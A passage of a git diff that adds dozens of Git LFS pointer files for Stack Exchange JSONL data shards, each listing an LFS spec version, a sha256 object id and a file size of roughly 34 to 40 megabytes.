a/data/stackexchange/1-1/541_2289.jsonl b/data/stackexchange/1-1/541_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..314a2ac30ad150c7c41b8d14ca14d764b5b926c4 --- /dev/null +++ b/data/stackexchange/1-1/541_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e1c8f8973c25f3a73ce650c9cdf2a272e5588f86f5513a968a4861c39729b17 +size 35079545 diff --git a/data/stackexchange/1-1/542_2289.jsonl b/data/stackexchange/1-1/542_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e73addf5d0b81834e06e4c5dfce39636beadf92 --- /dev/null +++ b/data/stackexchange/1-1/542_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f30f35445b9334ad306fa573555ecb4a3959cc30ad14eda88273a890f597a532 +size 35498597 diff --git a/data/stackexchange/1-1/543_2289.jsonl b/data/stackexchange/1-1/543_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca38b2cbf5caeaf30752593834a8b07048ff58e4 --- /dev/null +++ b/data/stackexchange/1-1/543_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae1debbdfcbea8133e5358f6ff52040a090ffdd3ca8b63766bfc9997a55048b7 +size 34709545 diff --git a/data/stackexchange/1-1/544_2289.jsonl b/data/stackexchange/1-1/544_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aff507097daf5343524556b8d9af7fab9286e4a0 --- /dev/null +++ b/data/stackexchange/1-1/544_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edfeb880634ab73b7ed075fbb9117f2c9a312de04660709867edb394f669b118 +size 35211377 diff --git a/data/stackexchange/1-1/545_2289.jsonl b/data/stackexchange/1-1/545_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2e9fa43114a08d7ddcedf21ccb618744e60ff66 --- /dev/null +++ b/data/stackexchange/1-1/545_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1185b8c2b0b8a2f85d3092ad30c4aec5c4138ed4e5ba7f0dfe3f441e1ace2d29 +size 35100439 diff --git a/data/stackexchange/1-1/546_2289.jsonl b/data/stackexchange/1-1/546_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82e3355e635d25097859e52051ec52c4c99f054d --- /dev/null +++ b/data/stackexchange/1-1/546_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90dcc8e22219e70d6163f4996153b323cfd302b53d7bb7906e0219659f69be51 +size 35699343 diff --git a/data/stackexchange/1-1/547_2289.jsonl b/data/stackexchange/1-1/547_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fc1d2ce98a2f837627c696c0531e2579bd77c99 --- /dev/null +++ b/data/stackexchange/1-1/547_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:349e6e088d87dfc17ff9fa128b8255d69852df1d630e4b90b84156296b9d608f +size 35078551 diff --git a/data/stackexchange/1-1/548_2289.jsonl b/data/stackexchange/1-1/548_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b854d009906be9b995c0161747aed78ba43ab23 --- /dev/null +++ b/data/stackexchange/1-1/548_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65d0e43bda2ebe5a0ccb8e5a361adf900bf55e3a976ec7e7c0697107b02c3cd9 +size 35132953 diff --git a/data/stackexchange/1-1/549_2289.jsonl b/data/stackexchange/1-1/549_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b2d30a7fcb022e8f5449cbde8d88507eff04bcf3 --- /dev/null +++ b/data/stackexchange/1-1/549_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7e528d81d5391958dd1b2d556d974ebc67071d15cc5b0548fbdb61328c0d795 +size 35042066 diff --git a/data/stackexchange/1-1/54_2289.jsonl b/data/stackexchange/1-1/54_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec82b06c43d786550e907e6bbb62abf6c9a18ee0 --- /dev/null +++ b/data/stackexchange/1-1/54_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb198040cf357a6bd1cafdbe9b97e0ec885526aacbda936f8c7b57217a99a73a +size 38832849 diff --git a/data/stackexchange/1-1/550_2289.jsonl b/data/stackexchange/1-1/550_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a466aac8c88dce8a7035ef494fd19d398ae66e1a --- /dev/null +++ b/data/stackexchange/1-1/550_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c183a3a7934a29a10015e5602f0a15d81df0ac24637cd7580a0cfb311cc3f11f +size 34075147 diff --git a/data/stackexchange/1-1/551_2289.jsonl b/data/stackexchange/1-1/551_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3deaa5bf97a65c1109ffcbe323bcfd78f437a755 --- /dev/null +++ b/data/stackexchange/1-1/551_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93b48095dadc94929a5a4df86f2b0ec7e369775b9890f226d2d0e62fbdec8003 +size 34359627 diff --git a/data/stackexchange/1-1/552_2289.jsonl b/data/stackexchange/1-1/552_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e57f52a620482618955accdcb7046bb1b610a034 --- /dev/null +++ b/data/stackexchange/1-1/552_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1f4df1a7287d993b746993504f199e10fa26bc6a536d9514ce2ffdc42070d03 +size 34124003 diff --git a/data/stackexchange/1-1/553_2289.jsonl b/data/stackexchange/1-1/553_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fd8d3e1ebb020b95e1aad9e0c5655ea87d80a26 --- /dev/null +++ b/data/stackexchange/1-1/553_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31ad8491c29c9c23701c920e54275631145107f79db3d594c38a4f1ca483e368 +size 34365159 diff --git a/data/stackexchange/1-1/554_2289.jsonl b/data/stackexchange/1-1/554_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7f165cacef31e4fb6944172b347d00deaf50fa3 --- /dev/null +++ b/data/stackexchange/1-1/554_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b377e5b2b9e3c5603278cb7ed39da6a5b27bd809e1de5a6dd2348505b20e59c0 +size 34318690 diff --git a/data/stackexchange/1-1/555_2289.jsonl b/data/stackexchange/1-1/555_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9801e5db5fac9e817e971117599d14a401df1ea1 --- /dev/null +++ b/data/stackexchange/1-1/555_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8cf788e86dda8dad9cc2b276ad698c579937a0683a86dd53e918204b7d23f231 +size 34154606 diff --git a/data/stackexchange/1-1/556_2289.jsonl b/data/stackexchange/1-1/556_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b7578d7ce6c3d8fdeb2025d0a5ed5cd91040fb2 --- /dev/null +++ b/data/stackexchange/1-1/556_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7bb55d4cde239fc9372bf7c32badf92fe79b86db52ad57c658edf6ac4d516db +size 34145817 diff --git a/data/stackexchange/1-1/557_2289.jsonl b/data/stackexchange/1-1/557_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2fcf57405f5099bf35844b4e1e4b8cf81b3839a --- /dev/null +++ b/data/stackexchange/1-1/557_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9575c4d322469277f7279de07cec2c095cf89994393ce0ed5754dad97167e4b +size 34516391 diff --git a/data/stackexchange/1-1/558_2289.jsonl b/data/stackexchange/1-1/558_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..137bad5b3aa29d3ba8051787dfeb2f8464ad8124 --- /dev/null +++ b/data/stackexchange/1-1/558_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1546558d241692375dcab9a3d1e4ef2b4a7740b4e0c4dd99054c3486212ca28 +size 34819193 diff --git a/data/stackexchange/1-1/559_2289.jsonl b/data/stackexchange/1-1/559_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..288e918758a3cf4d7361d84ec909e544f0136616 --- /dev/null +++ b/data/stackexchange/1-1/559_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4143a01334071aa8f29f0b581af7719091d397b113ccb1ecec72d71e9a295b27 +size 34133548 diff --git a/data/stackexchange/1-1/55_2289.jsonl b/data/stackexchange/1-1/55_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad36d1ea6d15ec03a7d0a2ac79380ce38b0872be --- /dev/null +++ b/data/stackexchange/1-1/55_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94d1447e01c218f0b270d0d313b96d2212f432a46d489aca589be50c976e1d6f +size 39599760 diff --git a/data/stackexchange/1-1/560_2289.jsonl b/data/stackexchange/1-1/560_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e09ff468f4a6e046473b495c7afb9e3afa03cc2 --- /dev/null +++ b/data/stackexchange/1-1/560_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:defe8324ab57b9f8fa592c15caff468fa6fb6517d2ecc9bbd3d596e76901a2c1 +size 34391010 diff --git a/data/stackexchange/1-1/561_2289.jsonl b/data/stackexchange/1-1/561_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e9ac6eefafcadbc379e9117af9ff4305d8e33a4 --- /dev/null +++ b/data/stackexchange/1-1/561_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd9bde03ae66814e1e214e57903322b8887fe0583fc5c1a68b07024772337278 +size 34295854 diff --git a/data/stackexchange/1-1/562_2289.jsonl b/data/stackexchange/1-1/562_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..596a77203dc0414e430668dad2f77ea9af686636 --- /dev/null +++ b/data/stackexchange/1-1/562_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d148409d12091286ccd6e4732a22342dff2576452a39a14f432dba99d0ddc579 +size 34448213 diff --git a/data/stackexchange/1-1/563_2289.jsonl b/data/stackexchange/1-1/563_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..22fd6ea7a842cebd59722da8a43d2d81a349a57c --- /dev/null +++ b/data/stackexchange/1-1/563_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b2b59b5e8a818f0602222e4707877a6e965ab05c23dc468f833ce68cd5db3da +size 34399024 diff --git a/data/stackexchange/1-1/564_2289.jsonl b/data/stackexchange/1-1/564_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ab3778bc7756c6edf288dee555c532c4155215e --- /dev/null +++ b/data/stackexchange/1-1/564_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72653204090df903852dffd84fc33a5fd51824c500bcfe122c384d573e9322d2 +size 34550702 diff --git a/data/stackexchange/1-1/565_2289.jsonl b/data/stackexchange/1-1/565_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d911fe6a063ea7db1120e5fd7d1bc1f34309c3a --- /dev/null +++ b/data/stackexchange/1-1/565_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dae95cb4473d73459a61cca833f20316e58b7b6254fb5370e3350545545478fe +size 34576617 diff --git a/data/stackexchange/1-1/566_2289.jsonl b/data/stackexchange/1-1/566_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d05c374227cd5bfaa8a387720d157fae3a824868 --- /dev/null +++ b/data/stackexchange/1-1/566_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8408ecfbe1b887e523bcaf6e3f4871cc14159d5221905c3570bbecfcacae576c +size 34651727 diff --git a/data/stackexchange/1-1/567_2289.jsonl b/data/stackexchange/1-1/567_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab2d5bd55b5ef919f7a1eab4871f61504197eb6e --- /dev/null +++ b/data/stackexchange/1-1/567_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ad393e9ba0488d2a0f7cfd68e12357a321cc9f2095c6b681961e12e5a7d6eb6 +size 34080443 diff --git a/data/stackexchange/1-1/568_2289.jsonl b/data/stackexchange/1-1/568_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..deb230f1880eae7d35ee2ea0ce44cc9d834355e3 --- /dev/null +++ b/data/stackexchange/1-1/568_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23751b9ceb808f525ae7ed241d554a772d2124d2f62886e8d9512756d367be7c +size 34320606 diff --git a/data/stackexchange/1-1/569_2289.jsonl b/data/stackexchange/1-1/569_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..171952d49cf07006f327c185e4b71c903ea3c456 --- /dev/null +++ b/data/stackexchange/1-1/569_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f833934a23a1bcf62946afa063072ea17ea100891484ac48b46e5e8aef2636f +size 34925222 diff --git a/data/stackexchange/1-1/56_2289.jsonl b/data/stackexchange/1-1/56_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..231982e4ed65b115d4be0e995a4084134e508ccd --- /dev/null +++ b/data/stackexchange/1-1/56_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7b9d6f627cadeae680ebda96b7a05df9f59b0ff4951de13d26d7603064aac3 +size 40150385 diff --git a/data/stackexchange/1-1/570_2289.jsonl b/data/stackexchange/1-1/570_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..262c326e4f8be05d29bd0bc2562752e23e1b1ae6 --- /dev/null +++ b/data/stackexchange/1-1/570_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad3d8c70198c888deb3a9afca1f666cb1ac90678d5d50fc930ebe6e09591bc1f +size 34396921 diff --git a/data/stackexchange/1-1/571_2289.jsonl b/data/stackexchange/1-1/571_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae7b9713701f208b87bbe270e2994b3036f83155 --- /dev/null +++ b/data/stackexchange/1-1/571_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec730aa77cad1e3aad8d6a0492a5ea2dd30f9ad3d1f73905cf0f529fd9ab1c92 +size 33842622 diff --git a/data/stackexchange/1-1/572_2289.jsonl b/data/stackexchange/1-1/572_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a87228894187dfb80c3e91073a319b3e36b76ae3 --- /dev/null +++ b/data/stackexchange/1-1/572_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b473cc3186c7d6dee18d7fae88c916e403e2344c7fe58f55f8d3274279161e1 +size 34902096 diff --git a/data/stackexchange/1-1/573_2289.jsonl b/data/stackexchange/1-1/573_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..344bac9147b35c0df3fb9fd433b38f78bfe2e2e9 --- /dev/null +++ b/data/stackexchange/1-1/573_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69387b051aa086483cea46cdb8e80986779904fdd1a785fa4e787091bc3a3f1b +size 34498240 diff --git a/data/stackexchange/1-1/574_2289.jsonl b/data/stackexchange/1-1/574_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a16297a9e098ef254acc470f1a06618de6270c3 --- /dev/null +++ b/data/stackexchange/1-1/574_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f685d4058a2e83c367a594d308db1b7c6f2be7a7ea8b36bd71f9ab305cb7a54 +size 34620431 diff --git a/data/stackexchange/1-1/575_2289.jsonl b/data/stackexchange/1-1/575_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac945f10c2837e59f2ea2438e6d744af92552b95 --- /dev/null +++ b/data/stackexchange/1-1/575_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ddfa351617f74bc26244a0cff294cdfd5427b5c925982f9bda97ef17d2ddcc0 +size 34164986 diff --git a/data/stackexchange/1-1/576_2289.jsonl b/data/stackexchange/1-1/576_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e908ac634a1f1cd408fc395ebce64503e4f91dc2 --- /dev/null +++ b/data/stackexchange/1-1/576_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb7af55b8793eb535bcb4416375bb3db101db1b91f4362cfd90d27dd7db4826e +size 34695977 diff --git a/data/stackexchange/1-1/577_2289.jsonl b/data/stackexchange/1-1/577_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fe8cfca1d2925e380e3177aef39a8fd1ec38674 --- /dev/null +++ b/data/stackexchange/1-1/577_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf3306cfa409f90113839d2de8bad413f31c2b7a301976c2d268b4d9d57beb32 +size 34374824 diff --git a/data/stackexchange/1-1/578_2289.jsonl b/data/stackexchange/1-1/578_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..759bf8ee4c5030eb28d8fa9406b333654ff23101 --- /dev/null +++ b/data/stackexchange/1-1/578_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:171f854751901cd92c07b2a13c662dd5c63dd455ed60b9361fa5fa074a65fdf4 +size 34699039 diff --git a/data/stackexchange/1-1/579_2289.jsonl b/data/stackexchange/1-1/579_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29f60dc5628f761ebcb50ecf4b0741da0e55cd31 --- /dev/null +++ b/data/stackexchange/1-1/579_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d835c50e15c6edc69e4b7d8ed083493e46c5f524ff91e1ef1ba4b416eb3d1dee +size 34154302 diff --git a/data/stackexchange/1-1/57_2289.jsonl b/data/stackexchange/1-1/57_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7959155b724f01d7c18833647e333f33b1481c64 --- /dev/null +++ b/data/stackexchange/1-1/57_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e922996c2df518b5d8d333ff460420f05d1a005ac56dad8213d70d11871ce42 +size 39568771 diff --git a/data/stackexchange/1-1/580_2289.jsonl b/data/stackexchange/1-1/580_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bdb2193a819da18fbc7dab67bb0fefc1afece981 --- /dev/null +++ b/data/stackexchange/1-1/580_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9357d5d3f467344d755078539f9aafe324e09198f117419b0786f37d242f347e +size 33968992 diff --git a/data/stackexchange/1-1/581_2289.jsonl b/data/stackexchange/1-1/581_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18c7d02e4d0b8067aaa6f84380a0832cad17903e --- /dev/null +++ b/data/stackexchange/1-1/581_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd075618d35daf8ca3a7ed3de9846596f0c7886026136776945f3c64a9449f16 +size 34365170 diff --git a/data/stackexchange/1-1/582_2289.jsonl b/data/stackexchange/1-1/582_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d116629fc4a5bf652aa3a9a0ff941b7a62bc3e47 --- /dev/null +++ b/data/stackexchange/1-1/582_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8669526b4d698c4afd36137d4c70a29b2fab2128cc6d0ffbffc588bc17be1d4 +size 34109531 diff --git a/data/stackexchange/1-1/583_2289.jsonl b/data/stackexchange/1-1/583_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7523279baae5cebe252330ec8d0d15edc9a90c37 --- /dev/null +++ b/data/stackexchange/1-1/583_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f16bb5d4463e75f55909233d96f39ed746a6c62c6e46f1aeaa1d3c471a5f0597 +size 33961515 diff --git a/data/stackexchange/1-1/584_2289.jsonl b/data/stackexchange/1-1/584_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b460ef575b9fc79b5f6543504140a5e01b11c972 --- /dev/null +++ b/data/stackexchange/1-1/584_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53d750d962db4987740fe94a10811efe31b3db789fd23fe8ca096c65211a06d5 +size 33995693 diff --git a/data/stackexchange/1-1/585_2289.jsonl b/data/stackexchange/1-1/585_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5551f206d81a8525c59372da3a1782fc3124e321 --- /dev/null +++ b/data/stackexchange/1-1/585_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01282b17e3cb6d58404e24f1b6f2b387e1ae1c20fcf7e189994ac0e80569f010 +size 34535877 diff --git a/data/stackexchange/1-1/586_2289.jsonl b/data/stackexchange/1-1/586_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a151ab3a4b986f7c0b1628706514088949936479 --- /dev/null +++ b/data/stackexchange/1-1/586_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2987283452bfcdde08c77dbfa5bc40054443f6aaadb1e16b093a2232323738b +size 34762809 diff --git a/data/stackexchange/1-1/587_2289.jsonl b/data/stackexchange/1-1/587_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e658e97ea4ff488f1e3e9f146d1c6f3fe05b13c2 --- /dev/null +++ b/data/stackexchange/1-1/587_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1141301ef1601af50bd1feb977f93f90ea833faa626a89c166e3aae6a83e6fc9 +size 34464234 diff --git a/data/stackexchange/1-1/588_2289.jsonl b/data/stackexchange/1-1/588_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..773a5da70bb09f03888ceb12c5b0e4d0c86d6274 --- /dev/null +++ b/data/stackexchange/1-1/588_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:302dcbe5879bb0a117ea9856ac07c4c98281f3a7835170c76aa92203c4a74bfd +size 34095970 diff --git a/data/stackexchange/1-1/589_2289.jsonl b/data/stackexchange/1-1/589_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e637be83f5dd7e8750e6245cb31af2f9e2aacf68 --- /dev/null +++ b/data/stackexchange/1-1/589_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d40264bcc8af2957e1d1bdd539fc36d15731b85e718ca5f98d9fce409976a85 +size 34436991 diff --git a/data/stackexchange/1-1/58_2289.jsonl b/data/stackexchange/1-1/58_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5174abaadd8344a26eca9b37cb4b76ac189d048 --- /dev/null +++ b/data/stackexchange/1-1/58_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ece3cc6adf112fc58f8aa56458932b66a69132a4e72fd9e97b4e3fa840844a8a +size 39763982 diff --git a/data/stackexchange/1-1/590_2289.jsonl b/data/stackexchange/1-1/590_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b344c035c4412b36d41ab41e62fbe8f4e23ed9bc --- /dev/null +++ b/data/stackexchange/1-1/590_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06261ec6a22bc3a4eeb21498010140934bdf294cfe1d3cd189a0536766ad41b8 +size 34619622 diff --git a/data/stackexchange/1-1/591_2289.jsonl b/data/stackexchange/1-1/591_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..261826d8dac67e3ac6444bbf0081ac9888d90355 --- /dev/null +++ b/data/stackexchange/1-1/591_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:808240c208d4733965bf580bce9f160d31947171839f5459f6c2758119cd1615 +size 34386259 diff --git a/data/stackexchange/1-1/592_2289.jsonl b/data/stackexchange/1-1/592_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3599f0d25603545489b87664171d23f9f84a4091 --- /dev/null +++ b/data/stackexchange/1-1/592_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ed60439399e6059798926a3556c1ad52017f0e2828d8f265f58de5755595576 +size 33912486 diff --git a/data/stackexchange/1-1/593_2289.jsonl b/data/stackexchange/1-1/593_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29bf4473d593f5c8e9363b8225e13694c8675f2c --- /dev/null +++ b/data/stackexchange/1-1/593_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:681b671f98c3c52c259f3ac07588134a0d15ab64ac12fb527d1180729b81f0a9 +size 34635442 diff --git a/data/stackexchange/1-1/594_2289.jsonl b/data/stackexchange/1-1/594_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bea7aba5e8c4467fa1faeaeada0c41b8802e1e44 --- /dev/null +++ b/data/stackexchange/1-1/594_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2c066be2cdd6a30cff1fae273dfad6ab3c025517a6200b52a72f075229a5495 +size 34343504 diff --git a/data/stackexchange/1-1/595_2289.jsonl b/data/stackexchange/1-1/595_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d587aca2dd4f054123347c3a8156ab73ca296ce --- /dev/null +++ b/data/stackexchange/1-1/595_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2415a85dbde9ec663fa45e003111f420bc9281c155f3420e140a8841d2827e74 +size 33975537 diff --git a/data/stackexchange/1-1/596_2289.jsonl b/data/stackexchange/1-1/596_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1fa4fe258abc1885ecf3539b96c50446edfe36c --- /dev/null +++ b/data/stackexchange/1-1/596_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:254c473193f2205baa3bc86e24d8dd153ce5be0ca2613d26124b2093a72cfe1c +size 34470123 diff --git a/data/stackexchange/1-1/597_2289.jsonl b/data/stackexchange/1-1/597_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40b3ad3cdd466b028697d171a136d0301493c000 --- /dev/null +++ b/data/stackexchange/1-1/597_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe0c0c2b8597a55e7089ce9bc3fb83944fb374ab7abe34c7b4a7c096b461e283 +size 34197188 diff --git a/data/stackexchange/1-1/598_2289.jsonl b/data/stackexchange/1-1/598_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..789c147dbc34220cb60127123d8bba3c989578f3 --- /dev/null +++ b/data/stackexchange/1-1/598_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a85380aabff971b7542a44929632f2cbac517a525b85e0fb7ea64bbac0a42728 +size 34104143 diff --git a/data/stackexchange/1-1/599_2289.jsonl b/data/stackexchange/1-1/599_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2958228d0cc43a33af7a864549922a43ac9b1f79 --- /dev/null +++ b/data/stackexchange/1-1/599_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33ddba1d1706683f4ee1b7ecf7f3b053965473860c67012fb9330c28e84ed15e +size 34529565 diff --git a/data/stackexchange/1-1/59_2289.jsonl b/data/stackexchange/1-1/59_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f777818c8b0a4dd26a186cdb68a848643442e9f4 --- /dev/null +++ b/data/stackexchange/1-1/59_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:781e9e433615be963bfcc5d7bd9a042aa04c0fddff5c421df0bc8f4fa41d464a +size 39711458 diff --git a/data/stackexchange/1-1/5_2289.jsonl b/data/stackexchange/1-1/5_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e59b2f26aa982972f5458aa6f15c3ba2644356f2 --- /dev/null +++ b/data/stackexchange/1-1/5_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89832e86c4a27dec6d10a3754351ac0e40ff58497950aa79b59640fb6beb556a +size 36003595 diff --git 